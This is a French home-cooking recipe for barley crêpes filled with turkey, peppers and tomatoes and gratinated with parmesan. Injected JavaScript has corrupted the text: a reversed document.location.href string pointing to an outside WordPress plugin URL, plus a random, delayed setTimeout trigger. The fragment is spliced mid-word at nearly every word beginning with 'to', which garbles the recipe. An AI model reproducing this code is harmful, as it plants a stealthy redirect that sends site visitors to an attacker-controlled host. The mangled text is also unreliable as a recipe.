
CRÊPES À L’ORGE MONDÉ FAÇON “ENCHILADAS”
Pour 4 Pers.
INGRÉDIENTS :
Pour la pâte à crêpes:
– 500g de farine d’orge mondé (magasin bio)
– 1 litre d’eau
– 4 œufs
– Huile d’olive : 4CS.
– Sucre de coco : 1 CS.
– Sel fin : 1 CC. rase
Pour la farce à la dinde:
– 3 beaux filets de dinde détaillés en gros cubes
– 2 gros poivrons rouges détaillés en lamelles
– 1 oignon rouge émincé
– Une gousse d’ail émincée
– 3 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates mûres coupées en gros cubes
– un peu de persil haché congelé
– épices “Cajun”
– huile d’olive
– parmesan pour gratiner
Préparation des crêpes:
Mélanger toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les ingrédients au fouet pour obtenir une pâte lisse et laisser reposer ¼ d’heure.
Bien chauffer une poêle anti-adhésive et la huiler rapidement avec un pinceau.
Verser immédiatement une petite louche de pâte et incliner la poêle dans toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les sens pour obtenir de jolies crêpes fines (attention elles cuisent rapidement !)
Retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourner la crêpe dès que le dessus a figé et laisser cuire rapidement la 2eme face.
Renouveler l’opération jusqu’à épuisement de la pâte en huilant toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours un peu la poêle entre chaque crêpe.
Préparation de la farce :
Faire chauffer un peu d’huile d’olive dans un wok et y faire revenir l’ail et l’oignon rapidement.
Rajouter le poulet et les épices et cuire 2 minutes à feu vif
ajouter les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates et cuire 2 minutes.
Ajouter le poivron et cuire quelques minutes de plus jusqu’à ce que le poivron soit tendre mais pas mou !
Parsemer de persil haché.
Assemblage :
Préchauffer le four en position grill (ou très chaud).
Étaler une bande de farce sur la crêpe et rouler cette dernière sur elle-même.
Aligner les crêpes dans un grand plat à gratin
saupoudrer de parmesan et enfourner jusqu’à ce que le dessus soit légèrement gratiné et l’ensemble chaud.
Le petit mot de Joanne : Ces crêpes sont vraiment toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top !
Toute la famille va adorer. En plus elles se congèlent très bien. Je vous donne ici la recette pour faire 16 crêpes.
Vous pouvez en utiliser 8 pour un repas pour 4 personnes (accompagné d’une salade verte), et réserver les autres pour une autre fois (J’ai un faible pour l’association “viande hachée, épinards frais, sauce toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate”)
Bon appétit !
